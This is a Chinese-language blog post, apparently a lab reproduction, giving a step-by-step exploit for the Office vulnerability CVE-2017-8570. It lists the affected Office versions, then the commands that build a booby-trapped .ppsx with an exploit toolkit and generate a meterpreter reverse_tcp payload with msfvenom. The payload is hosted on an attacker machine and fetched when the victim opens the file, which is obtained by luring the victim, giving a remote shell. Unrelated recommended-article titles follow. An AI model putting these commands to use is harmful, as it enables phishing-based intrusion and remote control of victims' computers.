CVE-2017-8570影响office版本

Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)

一、使用exp:cve-2017-8570_toolkit.py

攻击机为192.168.43.141

目标机为192.168.43.128

攻击机:

python cve-2017-8570_toolkit.py -M gen -w test.ppsx -u http://192.168.43.141/a.doc //①

需要在exp目录下新建template文件夹,下有template.ppsx

生成test.ppsx,发送给目标机

攻击机:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.141 LPORT=4567 -f exe > shell.exe

mv shell.exe /tmp/

生成反弹shell,移动到/tmp下

攻击机:
python cve-2017-8570_toolkit.py -M exp -e http://192.168.43.141/shell.exe -l /tmp/shell.exe //②

同时开启msfconsole,handler监听

诱导目标机点击test.ppsx,最后成功获取shell

二、思路

利用ppsx打开时的漏洞,会执行一个系统sct脚本,这个脚本在cve-2017-8570_toolkit.py第一步时写好,用于获取反弹shell。

反弹shell.exe位于攻击机上,ppsx运行时以http的形式自动获取反弹shell.exe,最后被攻击机成功监听到。cve-2017-8570_toolkit.py第二步用于指导sct脚本获得攻击机上的shell.exe。

office ppsx逻辑漏洞(CVE-2017-8570)相关推荐

  1. 【漏洞复现】Moniker禁用绕过漏洞|ole逻辑漏洞(CVE-2017-8570)

    >> 在上一篇文章中提到了由于注册表项关于 ActiveX 控件功能的设置,导致 0199 的威胁并没有想象中的广泛,然而衍生漏洞 8570 的威胁却要比 0199 大得多: 微软修复 C ...

  2. 【漏洞复现】RTF URL Moniker 的逻辑漏洞 | OLE2Link 漏洞(CVE-2017-0199)

    一.CVE-2017-0199--类型:OLE对象中的逻辑漏洞 漏洞利用 OFFICEOLE 对象链接技术,将恶意链接对象嵌入在文档中,之后调用 URLMoniker 将恶意链接中的 HTA 文件下载 ...

  3. labview由于其他对话正在访问FIFO_Windows内核逻辑漏洞:IO管理器访问模式不匹配...

    概述 本文深入介绍了Windows内核中一个有趣的逻辑漏洞,以及我与Microsoft的合作伙伴共同修复的过程.如果内核和驱动程序的开发人员在访问设备对象时未考虑IO管理器的操作方式,那么漏洞所产生的 ...

  4. Android 组件逻辑漏洞漫谈

    前言 随着社会越来越重视安全性,各种防御性编程或者漏洞缓解措施逐渐被加到了操作系统中,比如代码签名.指针签名.地址随机化.隔离堆等等,许多常见的内存破坏漏洞在这些缓解措施之下往往很难进行稳定的利用.因 ...

  5. 【CyberSecurityLearning 65】业务安全+业务逻辑漏洞实战

    目录 业务安全 * 业务安全概述 * 黑客攻击的目标 业务安全测试流程 * 测试准备 * 业务调研 * 业务建模 * 业务流程梳理 * 业务风险点识别 * 开展测试 * 撰写报告 万能用户名|密码 业 ...

  6. 攻防演练中的业务逻辑漏洞及检测思路

    随着各类前后端框架的成熟和完善,传统的SQL注入.XSS等常规漏洞在Web系统里逐步减少,而攻击者更倾向于使用业务逻辑漏洞来进行突破.业务逻辑漏洞,具有攻击特征少.自动化脆弱性工具无法扫出等特点,也为 ...

  7. 逻辑漏洞小结之SRC篇

    最近在挖各大src,主要以逻辑漏洞为主,想着总结一下我所知道的一些逻辑漏洞分享一下以及举部分实际的案例展示一下,方便大家理解. 主要从两个方面看,业务方面与漏洞方面.(接下来就从拿到网站的挖掘步骤进行 ...

  8. 逻辑漏洞挖掘初步总结篇

    逻辑漏洞 在我理解中,逻辑漏洞是指由于程序逻辑输入管控不严,导致程序不能够正常处理或处理错误,一般出现在登录注册.密码找回.信息查看.交易支付金额等. 我将所有逻辑漏洞的问题分为前端和后端两个部分,总 ...

  9. 逻辑漏洞之修改响应包绕过登录校验

    逻辑漏洞是由于程序逻辑不严或逻辑太复杂,导致被***者利用,从而通过篡改相关数据来达到自己的目的,如绕过登录校验等! 实践操作 简单原理介绍   (这里只对本次实践原理的一个简单介绍)由于对登录的账号 ...

最新文章

  1. 11.CCNA第十一天-配置OSPF/EIGRP(增强型内部网关协议)
  2. Github上这几个沙雕项目,够我玩三天!
  3. 自己实现strcpy
  4. 百万数据报表读取:步骤分析以及自定义事件处理器
  5. Punycode与中文互转
  6. Windows 10下高效工作——快捷键一览
  7. paip.提升用户体验---提取FLASH中图片
  8. python判断手机号码是否正确_python检测手机号码是否合法
  9. a标签下载文件直接打开的问题
  10. Openwrt_树莓派B+_Wifi中继
  11. 微信小程序父子组件之间传值
  12. ngx_lua arg类型_使用模式,Arg和类型微调Drupal主题
  13. 模拟新浪微博自动登陆
  14. Unity SKFramework框架(一)、Audio音频管理器
  15. 用计算机程序计算鸡兔同笼,Linux脚本基础篇-鸡兔同笼问题(示例代码)
  16. chrome密码导出导入
  17. matlab的数值积分
  18. 4 变量、作用域与内存
  19. 精致又小巧的3款黑科技软件,一旦使用,难以割舍
  20. 【云栖大会】基因行业陷入“怪圈”,数据存储成本竟然超过检测成本

热门文章

  1. python脚本控制ios手机app_appium 下 python 脚本自动化测试iOS APP 实例
  2. 刘林仙《薛仁贵征东》 《薛丁山征西》整理
  3. 手机不能打电话没有信号无服务器,手机没信号也能拨打电话?不知道了吧!
  4. 华硕ac66php服务器,华硕ASUS RT-AC66U无线路由器部署NTP Server最佳实践
  5. matlab多项式的求值,多项式求值的MATLAB实现
  6. Angular Router的组件路由介绍
  7. scratch算立方根
  8. 过年别再逼婚了,《黑镜》里的AI相亲系统是对爱情最好的匹配
  9. [转]设置IE背景色保护你的眼睛视力_鹤壁吧_贴吧
  10. vue安装node-sass错误